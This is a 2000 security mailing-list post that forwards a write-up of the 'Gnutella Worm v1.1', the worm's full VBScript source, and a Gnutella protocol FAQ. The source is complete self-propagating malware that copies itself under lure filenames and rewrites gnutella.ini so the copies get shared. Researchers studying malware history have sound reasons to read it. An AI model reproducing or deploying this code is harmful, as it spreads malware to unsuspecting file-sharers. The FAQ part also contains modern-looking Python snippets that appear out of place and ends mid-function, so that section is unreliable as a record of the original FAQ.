[Snort-users] Fwd: kyxspam: gnutella worm

Dragos Ruiu dr at ...50...
Mon Oct 9 04:49:07 EDT 2000


While on the subject.... there are some more proto specs below
for Gnutella and Scour. I think most of you will find this 
one interesting...

cheers,
--dr

----------  Forwarded Message  ----------
Subject: kyxspam: gnutella worm
Date: Sun, 8 Oct 2000 12:54:46 -0700
From: Dragos Ruiu <dr at ...381...>


(Most of the excellent resources here are courtesy 
of the Wired research dept...

I've collated in this message a:
	-Description of the gnutella worm
	-Worm Source code
	-Plain English description/faq of how the Gnutella protocol works
	-The gnutella protocol spec
	-The protocol spec of a similar peer-to-peer system called Scour
	(The napster/OpenNap protocol spec was published a while back
	in kyxspam if you weren't on the list at that time and you want it let
	me know...)

I'm glad to see that credit is given to "crowds" in the FAQ.... this old
anonymizer proxy system created by some researchers at AT&T 
predates napster and all these other peer-to-peer onion routing 
systems and deserves some credit for the innovation. Though others
may even predate this,  it's the first such system I have on record
from over three years ago....

Look for these sorts of peer-to-peer infestations to increase in 
the future....  I'd be surprised if a Napster worm didn't exist yet.

cheers,  
--dr)


url: http://www.gnutty.co.uk/feature/worm/advanced.html

gnutella worm
-----
There have been reports that this new gnutella worm is harmless. This is simply not true. All you have to do is look at a file name on a search, and your computer will blow up. It will burst into flames and bring the whole of gnutellaNet down with it. Only joking :)

 Here's the facts:-
This worm, called Gnutella Worm v1.1, is built in VB Script. VBS runs off the Windows Scripting host which nearly every Windows user has installed. First let's get one thing straight - it doesn't actually do anything to your PC, or any of your important files. And it doesn't do anything unless you download it using gnutella, and then execute it - but I don't think any of you are that stupid.
-----

advanced
OK, so you do a little search on gnutella. What do you find? Amongst all the redundant files, .html porn redirects and other crap, you find a .vbs file of one of these many aliases:-

"Jenna Jameson movie listing.vbs"
 "Pamela Anderson movie listing.vbs"
 "Asia Carerra movie listing.vbs"
"xxx FTP movie listing.vbs"
"ASF Compressor (No quality loss).vbs"
"collegesex.vbs"
"Gladiator.vbs"
"Battlefield Earth.vbs"
"Evangelion complete episodes scripts.vbs"
"Scan Master checklist.vbs"
"How to eat pussy.vbs"
"Alicia Silverstone.vbs"
"Pearl Jam.vbs"
"Mp3 compressor (Half the size but same quality).vbs"
"Napster Metallica Crack.vbs"
"Santana.vbs"
"NSync.vbs"
"Nirvana.mp3.vbs"
"Shania Twain.mp3.vbs"
"Jesus loves you.vbs"
"Gnutella upgrade.vbs"
"OFFICIAL Gnutella Option Pack.vbs"

 Now let me give you a warning: never open .vbs files unless you are sure they are safe. Treat them in the same way as you treat .exe's. VBS can do a lot of damage, and you've got to be careful with them. If you really want to execute one, check it through in Notepad first to see if it is life-threatening.

 And for all you budding programmers, here's the script. It's in .txt format, so there's no danger of infecting yourself. So go ahead, take a peek.

 You download one of these, and like an excited kid on Christmas Day - you open it. And you are greeted by the sound of chugging from your pc (or is that just from my lump of junk ;) and a window popping up:

 

wtf, you think. You are distracted by this error, so you don't realise that loads of new files have been made in your gnutella directory. This directory is usually C:\Program Files\gnutella\. Let's explain these files:-

#######################################

 Yet another GWV! ('long number').zip
This file is created as well. Despite its name, this file isn't a zipped archive. Instead it's a text file that you can safely open in Notepad. This file contains the following:-

 Generation #: (number)
Victim ID: (long number)
Infection date: (date)
If I was a naughty boy, I could use scripting to get name, email, whatever file I want. 

The first number is a generation number. This is the number that increases every time it spreads itself. For example, the generation number is currently 10. You download a .vbs file off me and execute it. As soon as you execute it, the number is changed to 11. Then somebody gets it off you, the number will then be changed to 12, etc.

 The second number is a very long one. This number is unique to you and is used by gnutella to keep track of where to send search requests. The worm does nothing to this number except display it in this file and use it for the file name. 

 The date displayed is the date that the person who you got the file off got infected. The final thing in this file is a little quote..... "If I was a naughty boy, I could use scripting to get name, email, whatever file I want." Hmm...I'm no expert at VBS but I don't think that's possible (apart from the "whatever file I want" bit, which is possible), so don't worry about it.

 gnutella.ini
You'll also notice that your gnutella.ini file has been edited. The additions made are:-

databasepath=....... - These are the directories that gnutella shares with the world, separated by a ";". GW adds the directory which contains the .vbs files to any directories already defined in here. This is usually C:\Program Files\gnutella.

 extlist=..... - These are the file types you would like to share with the world, separated by a ";". These are usually things like mp3, avi and zip. GW adds "vbs;" to this list.

 These 2 additions to the gnutella.ini file are made so that the worm can spread itself. How? Well first it has to point gnutella to the place where your now multiple .vbs files are kept. This is usually C:\Program Files\gnutella. Then it has to make it available to people who search your list of files. It does this by adding vbs to the extension list. Simple. Too simple.

 But there's a little bug in this worm that adds both "C:\Program Files\gnutella\;" and "vbs;" loads of times. This is a mistake by the author, but it doesn't stop either the worm or gnutella from functioning properly.

 various file names.vbs
These files are nearly identical to the one you executed in the first place apart from a few minor changes. First, and most obvious, is the file name. This file name may be any of the names on the list above (or there may be different ones now). These file names come from the array within the script, which writes a copy under every name in it; that makes catching the virus even easier (and harder to stop!). The file names are aimed at getting as many people as possible to download it, but I don't see many people searching for "Evangelion complete episodes scripts" ;)

 The second change is similar to the last one, except it is contained within the script itself. It is the "CurrentFilename" variable. This is changed to reflect the filename of the current file.

 Change 3 is the "CurrentGeneration" variable. This is the number that keeps track of how many people are caught by the bug. Each time somebody executes the script, 1 is added to this value when the new files are created.

 The final change is the "InfectionDate". This is changed so that the first definition is the time/date you got infected, and the second definition is the time/date the person before you got infected. This changes every time somebody is infected.

 #######################################

 Finally, after leaving you several presents the worm deletes itself. You then forget all about it, but it's still there - in your gnutella directory. Other people do a search for something as innocent as "Jesus loves you" and they stumble across your file. They download it off you, execute it and then they forget about it. That's how it spreads....but you can get rid of it very easily - so other people don't have to suffer with it.

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(and the worm code... --dr)

url: http://www.gnutty.co.uk/feature/worm/gw.txt

Option Explicit
Dim CurrentFilename, CurrentGeneration, InfectionDate
CurrentFilename = "OFFICIAL Gnutella Option Pack.vbs"
CurrentGeneration = 12
InfectionDate = "5/31/2000, 10:17:03 AM"


'
const ProgramName = "Gnutella Worm v1.1"
const ProgramDate = "2000 May 21. I think that's the first Gnutella Worm."
'
'
' Watching CurrentGeneration will be quite interesting. I wonder if
' anyone ever studied this compared with real viral spreading.
'
' 42
'
' History
'
'  1.1  o Now copies itself to a list of target keyword instead of just current filename
'       o Fixed a but with Ini path... (1.0 didn't work at all. he he.)
'
'  1.0  o Initial Release
'

' Behavior Control Parameters
Dim NewFilenames, GnutellaPath, GnutellaIni, VictimFilename
NewFilenames    = Array(ProgramName & ".vbs", "Jenna Jameson movie listing.vbs", "Pamela Anderson movie listing.vbs", "Asia Carerra movie listing.vbs", "xxx FTP movie listing.vbs", "ASF Compressor (No quality loss).vbs", "collegesex.vbs", "Gladiator.vbs", "Battlefield Earth.vbs", "Evangelion complete episodes scripts.vbs", "Scan Master checklist.vbs", "How to eat pussy.vbs", "Alicia Silverstone.vbs", "Pearl Jam.vbs", "Mp3 compressor (Half the size but same quality).vbs", "Napster Metallica Crack.vbs", "Santana.vbs", "NSync.vbs", "Nirvana.mp3.vbs", "Shania Twain.mp3.vbs", "Jesus loves you.vbs", "Gnutella upgrade.vbs", "OFFICIAL Gnutella Option Pack.vbs")
GnutellaPath    = "C:\Program Files\gnutella\"
GnutellaIni     = GnutellaPath + "gnutella.ini"
VictimFilename  = "Yet another GWV! "                   ' (Gnutella Worm Victim :)


Const ForReading = 1
Const ForWriting = 2


Dim fso
Dim SourceFile, DestinationFile
Dim NewFilename
Dim VictimName

Function ModifyAndCopy
  ' Change Header data (New name, Generation number, any info passed down to the next Generation)

  DestinationFile.WriteLine(SourceFile.ReadLine)
  DestinationFile.WriteLine(SourceFile.ReadLine)

  DestinationFile.WriteLine("CurrentFilename = """ & NewFilename & """")

  DestinationFile.WriteLine("CurrentGeneration = " & (CurrentGeneration + 1))

  DestinationFile.WriteLine("InfectionDate = """ & Date & ", " & Time & """")

  SourceFile.ReadLine ' Skip the ones we just wrote changed.
  SourceFile.Readline
  SourceFile.Readline


  ' Copy the rest of the file as-is
  Do While Not SourceFile.AtEndOfStream
    DestinationFile.WriteLine(SourceFile.ReadLine)
  Loop
End Function

Function ProcessIni
  Dim IniFile, IniFileDest
  Dim Line

  Set IniFile = fso.OpenTextFile(GnutellaIni, ForReading)
  Set IniFileDest = fso.CreateTextFile(GnutellaIni + "_", ForWriting)

  Do While Not IniFile.AtEndOfStream
    Line = IniFile.ReadLine

    if Left(Line, 8) = "extlist=" Then
      IniFileDest.WriteLine(Line + ";vbs")
    ElseIf Left(Line, 13) = "databasepath=" Then
      IniFileDest.WriteLine(Line + ";" + GnutellaPath)
    ElseIf Left(Line, 12) = "clientid128=" Then
      VictimName = Mid(Line, 13)
      IniFileDest.WriteLine(Line)
    Else
      IniFileDest.WriteLine(Line)
    End If
  Loop

  IniFileDest.Close
  IniFile.Close

  fso.DeleteFile(GnutellaIni)
  fso.MoveFile GnutellaIni + "_", GnutellaIni

End Function

Function SignalVictim
  Dim Victim
  Dim Line
  Dim SignatureFilename
  
  SignatureFilename = GnutellaPath & VictimFilename & VictimName & ".zip"

  Set Victim = fso.CreateTextFile(SignatureFilename, ForWriting)

  Victim.WriteLine("Generation #: " & CurrentGeneration)
  Victim.WriteLine("Victim ID: " & VictimName)
  Victim.WriteLine("Infection date: " & InfectionDate)
  
  Victim.WriteLine("If I was a naughty boy, I could use scripting to get name, email, whatever file I want.")

  Victim.Close
End Function

Set fso = CreateObject("Scripting.FileSystemObject")


If fso.FolderExists(GnutellaPath) Then
  For Each NewFilename in NewFilenames

    Set DestinationFile = fso.CreateTextFile(GnutellaPath + NewFilename, True)
    Set SourceFile = fso.OpenTextFile(CurrentFilename, ForReading)

    ModifyAndCopy
    ProcessIni
    SignalVictim

    SourceFile.Close
    DestinationFile.Close
  Next

End If

fso.DeleteFile(CurrentFilename)

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(a good overview of how the protocol works....   --dr)

url: http://www.rixsoft.com/Knowbuddy/gnutellafaq.html


Knowbuddy's Gnutella FAQ

I don't claim that this FAQ is all-inclusive, just that it contains a written record of some of my thoughts on the subject. No, I haven't even started writing my own client. I'm more of a ... consultant ... at this phase. This FAQ is very much a work in progress, so please let me know if you know of anything that you feel I should address. You can find me on EFnet IRC in #gnutelladev, or email me at gnutelladev at ...612... The latest version of this document should always be found at <http://www.rixsoft.com/Knowbuddy/gnutellafaq.html>.

Contents


Resources
	Gnutella
	Online Privacy & Anonymity
A Brief Overview of the Protocol
	Terminology
	Connecting
	Searching
	Downloading
	TTL (Time To Live)
	Differences from Napster
	Similarities with Napster
Servent-to-Servent Communication
	The Packet Header
	Functions
	Packet Routing
	An Important Note on Anonymity and Tracking
Known Issues with the Protocol
	Search Query Spoofing
	Search Result Spoofing
Protocol Enhancement Ideas
	Authentication and Trust
	Using UDP
	A Gnutella Proxy Server
Notes

Resources

Gnutella


http://gnutella.nerdherd.net/ 

http://capnbry.dyndns.org/gnutella/protocol.html

Online Privacy & Anonymity


Flood Control on the Information Ocean: Living With Anonymity, Digital Cash, and Distributed Databases 

Crowds
"Crowds is a system for protecting your privacy while you browse the web." 

Freedom
Zero Knowledge Systems
"Freedom combines online pseudonyms, powerful cryptography, and network technology to give you the best in personal Internet security."

A Brief Overview of the Protocol

Terminology

Most of the Internet works on a client-server basis. You, as the client, connect your machine to a server, which is normally bigger and faster than you, and you retrieve information (as files). The server rarely gets any files from you. The gnutella protocol is a bit different in that clients become servers and servers become clients all at once. The playing field is levelled and anyone can be a client or a server, no matter how big or fast they are. Since you can be both, the combination has become known as a "servent". However, to avoid confusion, I'll try to stick with the standard definitions of client and server whenever possible, to create a context.

This is accomplished by creating a sort of distributed environment. You act as a server to people who want the files on your machine, and you act as a client to access files on other people's machines. Of course, you can be just a server (by never bothering to retrieve any other files) or just a client (by not sharing any of your files), but in the spirit of openness and cooperation, you will probably end up doing a little of both. The gnutella network is made up of hundreds (eventually many thousands) of servents all chattering away at each other and sending files back and forth.

All communication is done over the TCP/IP protocol. Each piece of information is called a "packet", just like in Internet terms. More often than not, the gnutella packets coincide nicely with TCP/IP packets. Right now, the protocol uses TCP/IP only; no UDP.

Connecting

To connect to the network, you only have to know one thing: the IP address and port of any servent that is already connected. The first thing your servent does when it connects is announce your presence. The servent you are connected to passes this message on to all of the servents it is already connected to, and so on until the message propagates throughout the entire network.[1] Each of these servents then responds to this message with a bit of information about itself: how many files it is sharing, how many KBs of space they take up, etc. So, in connecting, you immediately know how much is available on the network to search through.

Searching

Searching works similarly to connecting: you send out a search request, it is propagated through the network, and each servent that has matching terms passes back its result set. Each servent handles the search query in its own way. The simple query ".mp3" could be handled in different ways by different servents: one servent might take it literally, matching anything with ".mp3" in it, while another might interpret it as a regular expression and match any character followed by "mp3". To save on bandwidth, a servent does not have to respond to a query if it has no matching items. The servent also has the option of returning only a limited result set, so that it doesn't have to return 5000 matches when someone searches for "mp3".
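As a rough illustration of the point above, here is a minimal Python sketch of two servents interpreting the same query differently. The function names, the sample file list, and the max_results cap are all made up for the example; they are not part of the protocol or of any real client.

```python
import re

def literal_match(query: str, filename: str) -> bool:
    """Treat the query as a plain, case-insensitive substring."""
    return query.lower() in filename.lower()

def regex_match(query: str, filename: str) -> bool:
    """Treat the query as a regular expression, so '.' matches any character."""
    return re.search(query, filename, re.IGNORECASE) is not None

def search(shared_files, query, matcher, max_results=50):
    """Return at most max_results hits; an empty list means 'send no reply'."""
    hits = [name for name in shared_files if matcher(query, name)]
    return hits[:max_results]

# Hypothetical shared-file list.
files = ["song.mp3", "xmp3_notes.txt", "mp3"]

print(search(files, ".mp3", literal_match))  # ['song.mp3']
print(search(files, ".mp3", regex_match))    # ['song.mp3', 'xmp3_notes.txt']
```

The same query returns different result sets depending on which servent answers it, which is why results on the network can look inconsistent.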

Since all of the searches are to the local servent's database, the servent sees what everyone else is searching for. Using this, most clients have a Search Monitor that allows the user to see, in real time, the searches that their servent is responding to.

Downloading

For file sharing, each servent acts as a miniature HTTP web server. Since the HTTP protocol is well established, existing code libraries can be used. When you find a search result that you want to download, you just connect to the servent in the same way your web browser would connect to a web server, and you are good to go. Of course, the servent has this built-in, so your normal web browser never has to enter the picture.

Servents are also smart enough to compensate for firewalls. If you are behind a firewall that can only connect to the outside world on certain ports (80, for instance) you will just need to find a servent running on port 80. Since the servents can serve on any port, you are likely going to find one that is serving on a firewall-friendly port. Also, if you are trying to download a file from a servent that is behind a firewall, you can ask the firewalled servent to push the file to you since you will not be able to connect to it directly. The only thing the protocol cannot compensate for is file transfers between two servents behind two different firewalls. In such a case, there really isn't anything that can be done.
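The firewall cases above boil down to a small decision table. The sketch below is only an illustration; transfer_plan and its return strings are invented names, and a real servent would also have to worry about which ports the firewall allows.

```python
def transfer_plan(downloader_firewalled: bool, host_firewalled: bool) -> str:
    """Decide how a file could move between two servents.

    'direct'     - the downloader connects to the host like a web browser would
    'push'       - the firewalled host is asked to connect out and push the file
    'impossible' - both sides are firewalled, so neither can accept a connection
    """
    if not host_firewalled:
        return "direct"
    if not downloader_firewalled:
        return "push"
    return "impossible"

print(transfer_plan(False, False))  # direct
print(transfer_plan(False, True))   # push
print(transfer_plan(True, True))    # impossible
```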

TTL (Time To Live)

Just like TCP/IP packets, gnutella packets have a TTL (Time To Live). The TTL starts off at some low number, like 5. Each time a packet is routed through a servent, the servent lowers the TTL by 1. Once the TTL hits 0 the packet is no longer forwarded. This helps to keep packets from circling the network forever. Also, each servent has the option to arbitrarily lower the TTL of a packet if it thinks it is unreasonable. So, even if I send all my packets with a TTL of 200, the odds are that most of the servents along the way are going to just immediately knock this down to a more reasonable number. The number of servents the packet has already been routed through is also noted, and acts as a sort of reverse-TTL.
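A minimal Python sketch of what one servent might do with the TTL and hop count when routing a packet. MAX_TTL is a hypothetical local policy value (the text only says a servent may lower an unreasonable TTL), and forward is an invented helper name.

```python
from typing import Optional, Tuple

MAX_TTL = 7  # hypothetical local limit for what counts as a "reasonable" TTL

def forward(ttl: int, hops: int) -> Optional[Tuple[int, int]]:
    """Return the (ttl, hops) to forward the packet with, or None to stop here."""
    ttl = min(ttl, MAX_TTL)  # knock an unreasonable TTL down first
    ttl -= 1                 # each servent lowers the TTL by 1
    hops += 1                # and counts itself in the reverse-TTL
    if ttl <= 0:
        return None          # TTL hit 0: the packet is no longer forwarded
    return ttl, hops

print(forward(5, 0))    # (4, 1)
print(forward(200, 0))  # (6, 1)
print(forward(1, 4))    # None
```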

Differences from Napster

A Napster network is closer to the traditional client-server motif. A client connects to one prebuilt Napster server and no one else. All queries are routed through this central server and it is the server that does the searching and returns the result set. The server still does not host the files, though. Once you have picked out a file you want, file transfer works similarly to the gnutella method.

The up-side of this is that there are many redundant servers and they are all in fixed locations, so you will always be able to connect to a Napster server somewhere. Also, the dedicated hardware for the searches is normally pretty fast and optimized, and you get your results all at once. The search language is also controlled, so you know that each server is going to treat search terms similarly. (With badly-written gnutella clones you have the possibility of "*.mp3" not actually matching anything because it doesn't support globbing.)

The down side is that the central servers don't talk to each other. This means that each Napster network is a wholly separate entity, which severely limits your search options. Several of the Napster clones allow you to choose which network you want to join, but the average user still has a hit-or-miss chance of finding the same user on the same network twice. Also, if the central server is bogged down, searches can take inordinate amounts of time.

Similarities with Napster

Both Napster and Gnutella allow you to control what files you share. Gnutella takes this a bit further than Napster by also allowing you to share different types of files, but the basic principles are the same.

Servent-to-Servent Communication


For the following examples, I am going to use the old cryptographic examples of Alice, Bob, and Eve. I'll also throw in Charlie, who will always be between Alice and Bob, and is essentially Alice's link to the outside world. Eve is the bad hax0r script-kiddie, bent on bringing down the network. Let us say that Alice is behind a firewall, connected only to Charlie, who is then also connected to Bob. Eve is going to move around a bit, so we'll leave her floating in limbo. Refer to Figure 001.

The Packet Header

All of the packets traveling around the network have a 23-byte header that consists of the following information: 

1. MessageID, 16 bytes - A unique identifier used for tracking this specific packet. It should be unique to the network, which is to say that two servents may not generate the same MessageID (within a reasonable amount of time), and one servent should never use the same MessageID more than once. 
2. FunctionID, 1 byte - The underlying point of the message. Labels the packet as a search, or a connection announcement (initialization), etc. 
3. RemainingTTL, 1 byte - The TTL left to this packet. The originating servent sets this and each servent the packet is routed through decrements it. See TTL. 
4. HopsTaken, 1 byte - The number of servents this packet has already been routed through. This starts at 0 and is incremented by each servent. 
5. DataLength, 4 bytes - The size of the remaining data in the packet. Included so that the processing servent will know when the incoming packet ends.
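The five fields above add up to 16 + 1 + 1 + 1 + 4 = 23 bytes. A minimal Python sketch of packing and unpacking such a header follows. The FAQ does not state the byte order of DataLength; little-endian is assumed here and should be checked against the protocol spec. The Header class and the helper names are invented for the example.

```python
import os
import struct
from typing import NamedTuple

# "<" = no padding, little-endian (an assumption, not stated in the text above).
# 16s = MessageID, B = FunctionID, B = RemainingTTL, B = HopsTaken, I = DataLength
HEADER = struct.Struct("<16sBBBI")

class Header(NamedTuple):
    message_id: bytes
    function_id: int
    remaining_ttl: int
    hops_taken: int
    data_length: int

def pack_header(header: Header) -> bytes:
    return HEADER.pack(*header)

def unpack_header(raw: bytes) -> Header:
    """Parse the first 23 bytes of a packet; the payload that follows is ignored."""
    return Header(*HEADER.unpack(raw[:HEADER.size]))

example = Header(os.urandom(16), 0x80, 5, 0, 12)
raw = pack_header(example)
print(len(raw))                       # 23
print(unpack_header(raw) == example)  # True
```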

Incidentally, since each connection is a unique combination of host and port, we'll track these later on using the pseudo-key ConnectionID.

Functions

The FunctionID field of the packet header tells the servent how to process the request. Valid requests are the INITialization (0x00), Search (0x80), and Client-Push Request (0x40). INITialization and Search both have responses, which set the low bit, making their values 0x01 and 0x81, respectively. A response to a Client-Push Request isn't necessary, as the receiving servent would either then push the file or not push the file to the sender. For more information on the layout of the packets for the individual functions, see the excellent documentation at <http://capnbry.dyndns.org/gnutella/protocol.html>.
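The FunctionID values quoted above can be written down as a small Python enum. The numeric values come from the paragraph; the Python names and the two helper functions are invented for illustration.

```python
from enum import IntEnum
from typing import Optional

class Function(IntEnum):
    INIT = 0x00
    INIT_RESPONSE = 0x01
    PUSH_REQUEST = 0x40
    SEARCH = 0x80
    SEARCH_RESPONSE = 0x81

def is_response(function_id: int) -> bool:
    """Responses are the request value with the low bit set."""
    return bool(function_id & 0x01)

def response_for(function_id: int) -> Optional[Function]:
    """Return the matching response ID, or None if the request has no response."""
    if function_id in (Function.INIT, Function.SEARCH):
        return Function(function_id | 0x01)
    return None  # e.g. a Client-Push Request is answered by pushing, or not

print(response_for(Function.SEARCH).name)   # SEARCH_RESPONSE
print(response_for(Function.PUSH_REQUEST))  # None
```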

Packet Routing

We'll start off with an INITialization packet, as that is how you announce your presence, and searches work in essentially the same way. When Alice connects to Charlie, she sends her INIT packet. Charlie receives it, and routes it on to Bob and Eve. At the same time, he sends back to Alice an INIT Response that tells Alice what his host IP and port are (even though Alice already knows this), how many files he is sharing, and how much space those files take up. When Bob and Eve get the routed INIT packet from Charlie, they send their own INIT Responses back to Charlie, who then forwards them back to Alice. Incidentally, Bob and Eve both forward the INIT packet on to everyone they are connected to, and so on, until the packet expires. In this way, Alice now has information about everyone her packets can reach before they expire.

The trick here is that Charlie needs to keep track of some of the messages that come his way. For this, he needs a good Routing Table. A routing table is a list of the last few hundred packets you have received, who sent them, and what they did. In this case, Charlie needs to keep track of the MessageID for the INIT packet that Alice sent, so when he gets replies from Bob and Eve he will know that they are supposed to go to Alice, and not some other person he is connected to. A really good routing table is indexed by MessageID, FunctionID, and ConnectionID, for fast lookup and just in case different clients use the same MessageID.

This is also useful because Charlie is eventually going to get the original INIT packet back from Eve, because Eve has no way of knowing that Charlie has already seen it. This isn't a problem as Charlie just looks in his Routing Table, notes that he has already processed this request, and simply drops the packet. The bigger the Routing Table, the less chance there is for propagating duplicate packets.

Also, Charlie doesn't want to keep all of the packets he has seen, just enough. So, Charlie will most likely also have a Most Recently Processed rotating pool. Basically, Charlie keeps track of the last time he got a duplicate for a fixed number of packets, 500 for example. Whenever he gets a new packet, he takes the oldest one from his MRP pool, deletes the corresponding entry from his Routing Table, and replaces both of them with the new packet. In this way, his Routing Table stays a fixed size so it doesn't eat up memory, but he's also limiting the chance of propagating duplicate packets.
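One way to picture Charlie's Routing Table and its Most Recently Processed pool is a single fixed-size ordered map, sketched below in Python. This is a simplification, not how any particular client does it: entries are keyed on (MessageID, FunctionID) only, the ConnectionID is stored as the value, and the class and method names are invented.

```python
from collections import OrderedDict

class RoutingTable:
    """Fixed-size record of recently seen packets, oldest entry first."""

    def __init__(self, capacity: int = 500):
        self.capacity = capacity
        self._seen = OrderedDict()  # (message_id, function_id) -> connection_id

    def record(self, message_id: bytes, function_id: int, connection_id) -> bool:
        """Return True if the packet is new (route it), False if it is a duplicate (drop it)."""
        key = (message_id, function_id)
        if key in self._seen:
            self._seen.move_to_end(key)     # remember when we last saw a duplicate
            return False
        if len(self._seen) >= self.capacity:
            self._seen.popitem(last=False)  # evict the oldest entry
        self._seen[key] = connection_id
        return True

    def reply_route(self, message_id: bytes, request_function_id: int):
        """Which connection sent the original request, or None if it was forgotten."""
        return self._seen.get((message_id, request_function_id))

table = RoutingTable(capacity=500)
table.record(b"init-from-alice", 0x00, "alice")       # new: forward to Bob and Eve
print(table.record(b"init-from-alice", 0x00, "eve"))  # False: Eve echoed it back
print(table.reply_route(b"init-from-alice", 0x00))    # alice
```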

Searching works on essentially the same concept: Alice to Charlie to Bob and Eve and then back again. However, obviously some additional information is passed back, such as the connection information of the hosting servent, and an array of results in a result set.

An Important Note on Anonymity and Tracking

There is one thing to note which will come into play much more later as we discuss security and spoofing: Bob cannot reliably tell whether the packets are originating from Alice or Charlie. The HopsTaken field of the header should let him know if it was Charlie (as it would be 0), but beyond that he cannot be sure, as he cannot know who else is connected to Charlie. There is also the possibility that Charlie is sending incorrect information in that field, so it really cannot be used to trace a packet back to its owner. Due to this, each servent only reliably knows about the servents it is directly connected to. Anyone else is a mystery. This is not a bug, it is a feature. In this way, Eve cannot correlate searches with any specific user or prosecute them for doing things that she considers wrong.

Known Issues with the Protocol

Search Query Spoofing

Eve's current favorite trick is to flood the network with so many search requests as to make it unusable by slower users. Since a search packet cannot be traced back to a specific sender, there currently is no reliable method of blocking such an attack. One suggestion was to disconnect hosts that suddenly start forwarding on large numbers of search requests. This has the possibility of simply disconnecting fast users, but it's the only viable solution at this time. Implementation of this is going to be tricky, though, as "too fast" is going to be different for every client.
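The "disconnect hosts that forward too many searches" suggestion could look roughly like the sliding-window counter below. This is only a sketch: FloodGuard, max_queries and window are invented names and values, and picking a threshold that does not punish fast but honest neighbours is exactly the hard part noted above.

```python
from collections import defaultdict, deque

class FloodGuard:
    """Count search packets per directly connected neighbour in a sliding time window."""

    def __init__(self, max_queries: int = 100, window: float = 10.0):
        self.max_queries = max_queries  # hypothetical per-client tuning knob
        self.window = window            # window length in seconds
        self._times = defaultdict(deque)

    def allow(self, connection_id, now: float) -> bool:
        """Record one search from this neighbour; False means it is over the limit."""
        times = self._times[connection_id]
        while times and now - times[0] >= self.window:
            times.popleft()             # forget searches older than the window
        times.append(now)
        return len(times) <= self.max_queries

guard = FloodGuard(max_queries=3, window=1.0)
print([guard.allow("eve", t) for t in (0.0, 0.1, 0.2, 0.3)])  # [True, True, True, False]
```

Timestamps are passed in explicitly so the behaviour is easy to check; a real servent would use its own clock.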

Another idea is to allow the user to tell the servent which search results are bogus. Once the servent has collected enough verifiably bogus packets from one other servent, it can disconnect from that servent. If Charlie tells his servent that enough bogus packets are coming from Eve's direction, then the servent can just assume Eve to be hostile and refuse to connect to her. Packets may still reach Charlie via other routes (through Bob), but if enough servents deny a host, eventually that host will be unable to connect to anyone. To prevent Eve from simply switching to another port, a "Ban this IP" option would probably be the way to go.
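A minimal Python sketch of the adaptive "Ban this IP" idea, assuming the user flags bogus results by hand. BanList and the threshold of 3 are invented for the example, and the addresses are from the documentation range.

```python
from collections import Counter

class BanList:
    """Ban a neighbour's IP once enough of its results were flagged as bogus."""

    def __init__(self, threshold: int = 3):
        self.threshold = threshold  # hypothetical number of strikes
        self._bogus = Counter()
        self.banned = set()

    def report_bogus(self, ip: str) -> None:
        self._bogus[ip] += 1
        if self._bogus[ip] >= self.threshold:
            self.banned.add(ip)

    def may_connect(self, ip: str, port: int) -> bool:
        # The port is deliberately ignored, so switching ports does not help Eve.
        return ip not in self.banned

bans = BanList(threshold=3)
for _ in range(3):
    bans.report_bogus("192.0.2.66")
print(bans.may_connect("192.0.2.66", 6346))  # False
print(bans.may_connect("192.0.2.66", 80))    # False
print(bans.may_connect("192.0.2.10", 6346))  # True
```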

Search Result Spoofing

This is a bit harder to deal with, as an intermediary servent (Charlie) has no way of knowing that the result packets it is routing (from Eve) contain bogus data. Only when Alice connects to Eve to retrieve the file will she know that the result was spoofed. Also, there is the possibility that Eve may be returning valid file pointers, but the files aren't what she says they are, and may contain viruses, etc. Again, an adaptive system on Alice's end such that Alice's servent eventually just refuses to see anything from Eve may be the answer to this.

Protocol Enhancement Ideas

These are just some ideas that I have come up with or have been mentioned on the mailing list or IRC. They are not, by any means, in any form of implementation, they are just ideas.

Authentication and Trust

If we extend the adaptive banning system that we are using to combat search spoofing such that we allow Charlie to tell Bob that he is banning Eve, then we begin to form a trust network. If Bob trusts Charlie, he may opt to put Eve "on probation" and watch her more closely. Or, he may simply trust Charlie implicitly and immediately ban Eve, or not trust Charlie at all and simply ignore him. Currently the protocol does not support sharing trust or banning information, but it could be worked in. Even if we don't want to extend the protocol to add a specific function for this, we could do it with specialized search packets that Bob and Charlie know not to route.

Additionally, we may choose to integrate some sort of authentication protocol such that Charlie knows that Alice is indeed Alice. One person in the channel suggested PGP-style keys and another mentioned Kerberos.

Using UDP

One of the most-often asked questions is why TCP/IP is used instead of UDP. One problem with using UDP is its connectionless nature. Charlie knows that Alice and Bob are there because their connections are still up. If Charlie used UDP, he'd have a tougher time telling when Alice or Bob disconnected abruptly from the network, and would probably waste bandwidth sending at Alice and Bob when they aren't actually there. Connection build time is the argument most heard from UDP proponents, but this isn't really an issue. Since the servents stay in constant contact with each other and aren't just dropping and creating connections on the fly (normally), the overhead for connection building is minimal.

A Gnutella Proxy Server

This was first brought up on the mailing list, and then in the channel. The following is a combination of ideas by myself, Watts, and Luis Muniz.

One of the things we've been tossing around on both the list and the channel is the idea of a gnutella proxy server or gateway. We've figured out a way to do it without having to break the protocol, so theoretically, someone could implement one immediately. A couple different design goals motivated us:


	- The Eve-types have been flooding the network with bogus searches and other flotsam. While the larger-bandwidth clients can handle this, it makes modem users essentially dead in the water. 

	- We want the ability to have a private local network that sees the outside world, but is not seen by it. A sort of gnutella firewall. 

	- There is the remote chance that corporations might allow gnutella if they have some control over what can be retrieved (i.e., only PowerPoint presentations). A proxy system would allow for this.

We'll continue with the above diagram in which Alice is the private local network user, Charlie is the proxy servent, and Bob and Eve are users on the rest of the public network. Since we do not have to break the protocol to implement such a beast, there are varying levels of proxying that can be brought about.

First, when Alice connects to Charlie, Charlie immediately does a *.*-type search to get Alice's shared files list. From then on, Charlie treats Alice's shared files as his own. When Bob performs a search that matches one of Alice's files, Charlie spoofs a return packet that points to the file on Alice's machine. The search request never even reaches Alice, but Alice's files are searched. Then, when Alice does a search that matches a file of Bob's, Charlie has been keeping track of Alice's searches and allows that response to pass back to Alice. In this way, Alice doesn't see any of the other network traffic, just the packets pertinent to her. Of course, if Alice doesn't want to share her files with anyone on the outside, she can simply not return any files to Charlie.
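The first level of proxying described above can be sketched as two small lookup tables on Charlie's side: one for the file lists of the private clients, one for the searches they have sent out. Everything here (ProxyIndex, its methods, the substring matching) is a hypothetical illustration of the idea, not an existing implementation.

```python
class ProxyIndex:
    """What a proxy servent (Charlie) might remember about its private clients."""

    def __init__(self):
        self._files = {}    # client -> list of shared filenames
        self._pending = {}  # MessageID of a client's search -> client

    def register_client(self, client, shared_files):
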